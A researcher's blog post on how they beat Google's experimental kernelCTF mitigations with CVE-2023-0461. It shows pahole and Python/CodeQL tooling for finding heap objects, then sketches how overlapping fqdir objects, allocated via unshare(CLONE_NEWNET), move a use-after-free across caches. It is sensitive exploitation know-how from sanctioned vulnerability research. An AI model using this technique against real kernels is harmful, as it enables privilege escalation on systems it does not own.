In 2023 Google launched a new Vulnerability Reward Program (VRP) called kernelCTF. I was fortunate enough to get first blood by compromising the instance with experimental mitigations.

In this article, after providing a brief overview of the mitigations, I will focus on the process I followed to identify the kernel objects used to compromise the system. Hopefully, this can be useful for those who are new to the field or are just curious about how certain unusual structures end up being utilized in kernel exploits.

The complete technical analysis of the exploit, can be found in the Google Security Research repository.

The Path To Experimental Mitigations

In 2022, I participated to the kCTF Vulnerability Reward Program, and managed to compromise Google’s hardened Kubernetes infrastructure with a novel exploitation technique that can be utilized to perform privilege escalation with a single byte written out-of-bounds.

All the kernel exploits submitted during the year have been collected in the Kernel Exploit Recipes Notebook, a book created by sirdarkcat to document all the different techniques.

Kernel Exploit Recipes Notebook

Google engineers analyzed all the exploits and developed experimental mitigations with the intent to stop entire classes of attacks. They mainly focused on preventing elastic objects from being easily used to exploit vulnerabilities in the kernel heap, and on preventing cross-cache attacks.

All details about the mitigations can be found in the MITIGATION_README. Here I will provide you with a short description:

  • CONFIG_KMALLOC_SPLIT_VARSIZE aims to be the elastic object killer by separating dynamic structures from fixed-sized objects. If the size of an object can be determined at compile time, the object is allocated in kmalloc slabs dedicated to fixed-size objects, otherwise, it is allocated in a slab for dynamic objects. As a downside, when objects are separated into multiple caches, slabs tend to be less prone to noise, and this leads to increased exploit stability. Furthermore, if the vulnerable object is allocated in a cache containing dynamic objects, this mitigation actually facilitates the exploitation process.

  • CONFIG_SLAB_VIRTUAL is designed to stop cross-cache attacks. It allocates SLUB objects from a dedicated virtual memory region and ensures that slab virtual memory is never reused for a different slab. Optionally it is also possible to add slab virtual guards between slabs. This protection is very effective, but it does not cover allocations after a certain size, as larger requests (> 8192 bytes), are passed directly to the page allocator.

In 2023, Google launched a new VRP program called kernelCTF, so I decided to participate, utilizing a vulnerability for which I had already written an exploit a short time before.

From UAF To PTSD

Some time before the launch of new VRP, as an exercise, I wrote an exploit for CVE-2023-0461 a Use-After-Free vulnerability caused by a missing check in the ULP subsystem of the Linux kernel, exploitable through the TLS subsystem.

With the original exploit, I was able to perform privilege escalation on multiple Linux distributions with less than 200 lines of code, without requiring a leak or a ROP chain. So when Google launched the new VRP, I thought I could use it to compromise the instance with experimental mitigations.

Unfortunately for me, on the that system, it was a completely different story.

The bug I was trying to exploit, was a Use-After-Free in kmalloc-512 that could easily be turned into a Double-Free. However, the object separation offered by CONFIG_KMALLOC_SPLIT_VARSIZE completely ruled out my original exploitation strategy, as the vulnerable object and the attacking objects were now allocated in separate caches, and with CONFIG_SLAB_VIRTUAL enabled, I could not use a cross-cache attack.

I won’t cover one day of failed attempts here, but I will mention that after one more unsuccessful attempt to cause a race condition in kmalloc-512 to overlap two linux_binprm objects, and use the overlapped binprm->cred pointers to cause a UAF in cred_jar, I realized that I was on the right track, I only needed something slightly different.

The pointer overlapping approach was correct, but I needed to overlap two pointers to dynamic structures, making them point to the same object. This would have allowed me to easily transfer exploitation primitives from one cache to another by causing a UAF in the dynamic cache from kmalloc-512.

Looking For A Structure

Manually analyzing thousands of kernel structures (and nested structures) to find a field that satisfies certain properties can be a tedious task. So at that point, I could proceed in two ways:

  • The 1337 way: Write an advanced object analyzer in Rust integrated with codeQL, capable of extracting structures from vmlinux using the DWARF format and automatically identifying exploitable objects .

  • The lazy way: Use pahole to dump all the kernel structures into a file and extend a Python library I wrote one year earlier to analyze kernel objects.

Aaand of course, I chose the second option: I used pahole to extract all the kernel structures from vmlinux:

pahole --suppress_aligned_attribute --suppress_packed --suppress_force_paddings --fixup_silly_bitfields --structs vmlinux > kernelctf-mitigation-structs

then, I extended libksp, a library I coded some time ago, to parse the pahole output and covert raw structures into Python objects. I added a deep_search() method to the Structure class to dig into nested structures and look for fields that can satisfy certain conditions:

class Structure:

[...]

    def deep_search(self, ksp, path="", offset=0, condition=lambda member: False):
        path = self.get_name() if not path else path
        for member in self:
            current_path = f"{path}.{member.get_name()}"
            total_offset = offset + member.get_offset()
            if not member.is_ptr() and member.is_struct():
                if nested_struct := ksp.get_struct(name=member.get_type_name()):
                    nested_struct.deep_search(ksp, current_path, total_offset, condition)
            elif condition(member):
                print(f"Found: {current_path}, Offset: {total_offset}, Type: {member.get_type_name()}")

[...]

At this point I only needed to code a function that returned True when certain conditions are met (is_ptr_to_dynamic_struct()), and loop through the structures, calling deep_search():

from libksp import KernelStructParser as KSP

ksp = KSP("./kernelctf-mitigation-structs")
structs = ksp.parse_structs()

def is_ptr_to_dynamic_struct(member):
    if member.is_ptr() and not member.is_fptr() and member.is_struct():
        if struct := ksp.get_struct(name=member.get_type_name()):
            if struct.is_dyn():
                return True
    return False

tls_context = ksp.get_struct(name="tls_context")
tls_context_cache = tls_context.get_cache() # kmalloc-512

for struct in structs:
    if not struct.is_dyn() and struct.get_cache() == tls_context_cache:
        struct.deep_search(ksp, condition=is_ptr_to_dynamic_struct)

The program returned many findings:

Found: srcu_struct.work.wq, Offset: 368, Type: workqueue_struct
Found: linux_binprm.mm, Offset: 16, Type: mm_struct
Found: bio_set.rescue_list.head, Offset: 320, Type: bio
Found: bio_set.rescue_list.tail, Offset: 328, Type: bio
Found: bio_set.rescue_workqueue, Offset: 368, Type: workqueue_struct
Found: fqdir.rhashtable.tbl, Offset: 64, Type: bucket_table
Found: netdev_queue.qdisc, Offset: 8, Type: Qdisc
Found: netdev_queue.qdisc_sleeping, Offset: 16, Type: Qdisc
Found: netdev_queue.pool, Offset: 120, Type: xsk_buff_pool
Found: kvm_page_track_notifier_head.track_srcu.work.wq, Offset: 368, Type: workqueue_struct
Found: intel_uncore_pmu.boxes, Offset: 352, Type: intel_uncore_box
Found: bpf_offloaded_map.map.kptr_off_tab, Offset: 56, Type: bpf_map_value_off
--- output cut here ---
[...]

One that caught my attention was the bucket_table pointer in fqdir.rhashtable.tbl.

Found: fqdir.rhashtable.tbl, Offset: 64, Type: bucket_table

fqdir contains a nested structure, rhashtable, rhashtable contains a pointer to a bucket_table object, and bucket_table is allocated in a dynamic cache. Exactly what I was looking for.

Here is the frqdir structure, followed by the nested structure rhashtable:

struct fqdir {
	long int                   high_thresh;          /*     0     8 */
	long int                   low_thresh;           /*     8     8 */
	int                        timeout;              /*    16     4 */
	int                        max_dist;             /*    20     4 */
	struct inet_frags *        f;                    /*    24     8 */
	struct net *               net;                  /*    32     8 */
	bool                       dead;                 /*    40     1 */
	struct rhashtable          rhashtable;           /*    64   136 */
	atomic_long_t              mem;                  /*   256     8 */
	struct work_struct         destroy_work;         /*   264    32 */
	struct llist_node          free_list;            /*   296     8 */

	/* size: 320, cachelines: 5, members: 11 */
	/* sum members: 225, holes: 2, sum holes: 79 */
	/* padding: 16 */
};

struct rhashtable {
	struct bucket_table *      tbl;                  /*     0     8 */
	unsigned int               key_len;              /*     8     4 */
	unsigned int               max_elems;            /*    12     4 */
	struct rhashtable_params   p;                    /*    16    40 */
	bool                       rhlist;               /*    56     1 */
	struct work_struct         run_work;             /*    64    32 */
	struct mutex               mutex;                /*    96    32 */
	spinlock_t                 lock;                 /*   128     4 */
	atomic_t                   nelems;               /*   132     4 */

	/* size: 136, cachelines: 3, members: 9 */
	/* sum members: 129, holes: 1, sum holes: 7 */
	/* last cacheline: 8 bytes */
};

And the bucket_table object, allocated in a dynamic cache (in our case dyn-kmalloc-1k):

struct bucket_table {
	unsigned int               size;                 /*     0     4 */
	unsigned int               nest;                 /*     4     4 */
	u32                        hash_rnd;             /*     8     4 */
	struct list_head           walkers;              /*    16    16 */
	struct callback_head       rcu;                  /*    32    16 */
	struct bucket_table *      future_tbl;           /*    48     8 */
	struct lockdep_map         dep_map;              /*    56     0 */
	struct rhash_lock_head *   buckets[];            /*    64     0 */

	/* size: 64, cachelines: 1, members: 8 */
	/* sum members: 52, holes: 2, sum holes: 12 */
};

At this point I only needed to know how the fqdir object was allocated, so I used pwnql a codeQL wrapper I wrote some time ago, to retrieve all the places where the object is allocated by the kernel. The program automatically generated a codeQL query similar to:

import cpp
import utils

Type Deref(Type t) { 
	result = t.(DerivedType).getBaseType() 
}

Type RecursiveDeref(Type t) {
	t.getPointerIndirectionLevel() = 0 and result = t or
		t.getPointerIndirectionLevel() > 0 and 
			result = RecursiveDeref(Deref(t))
}

class KmallocFunction extends Function {
	KmallocFunction() { 
		this.getName().regexpMatch("k[^_]*alloc[_a-z]*") or
			this.getName().matches("%kmemdup%") 
	}
}

class KmallocFunctionCall extends FunctionCall {
	KmallocFunctionCall() { 
		this.getTarget() instanceof KmallocFunction 
	}
}

class StructAllocatedByKmalloc extends Struct {
	KmallocFunctionCall kfc;
	StructAllocatedByKmalloc() { 
		this = RecursiveDeref(kfc.getFullyConverted().getType()) 
	}
	KmallocFunctionCall getAFunctionCall() { 
		result = kfc
	}
}

from StructAllocatedByKmalloc structure
	where structure.getName().matches("%fqdir%")
		select structure.getLocation(),
    		"Struct=" + structure.getName() +
    		",AllocatedBy=" + structure.getAFunctionCall().getLocation() +
    		",Size=" + structure.getSize() +
    		",Cache=" + kmallocSlab(structure.getSize())

then, after executing it, it returned the following result:

❯ pwnql alloc --struct fqdir

[+] Query 1: Search structures allocated by `k[^_]*alloc[_a-z]*` containing "fqdir" in name

[*] Result: 
 ╰─  Struct: fqdir
 ╰─  AllocatedBy: "https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L188"
 ╰─  Size: 320
 ╰─  Cache: kmalloc-512

And indeed, if we read the net/ipv4/inet_fragment.c source code, we have:

int fqdir_init(struct fqdir **fqdirp, struct inet_frags *f, struct net *net)
{
	struct fqdir *fqdir = kzalloc(sizeof(*fqdir), GFP_KERNEL);
	int res;

	if (!fqdir)
		return -ENOMEM;
	fqdir->f = f;
	fqdir->net = net;
	res = rhashtable_init(&fqdir->rhashtable, &fqdir->f->rhash_params);
	if (res < 0) {
		kfree(fqdir);
		return res;
	}
	refcount_inc(&f->refcnt);
	*fqdirp = fqdir;
	return 0;
}

After some source code reading, I found that fqdir_init() is called by ipv4_frags_init_net(), ipv6_frags_init_net() and by netfilter when a new network is initialized. The bucket_table in the rhashtable structure is automatically allocated by bucket_table_alloc() when rhashtable_init() is called in fqdir_init().

To trigger the fqdir allocations, it is only necessary to create a new network namespace using unshare(CLONE_NEWNET). After after a chain of calls (create_new_namespaces() -> copy_net_ns() -> setup_net()), setup_net() will initialize all the networks, and fqdir will be allocated.

At this point, I was able to orchestrate multiple tasks and call unshare(CLONE_NEWNET) from each of them to allocate multiple fqdir objects, overlapping two of them in kmalloc-512 to cause a UAF in dyn-kmalloc-1k, thanks to the overlapped bucket_table pointers. Finally, I could transfer exploitation primitives from one cache to another, unlock dynamic objects and complete the exploitation process.

All details about the exploit can be found in the Google Security Research repository.

Conclusion

In this brief blog post, I examined how Google’s experimental mitigations work and outlined the process I followed to identify the attacking objects used to compromise their hardened system. While these mitigations represent a significant advancement in kernel security, this analysis shows that vulnerabilities can still be exploited through unconventional approaches.

All the tools mentioned in this article are expected to be open-sourced in the near future.

Cheers!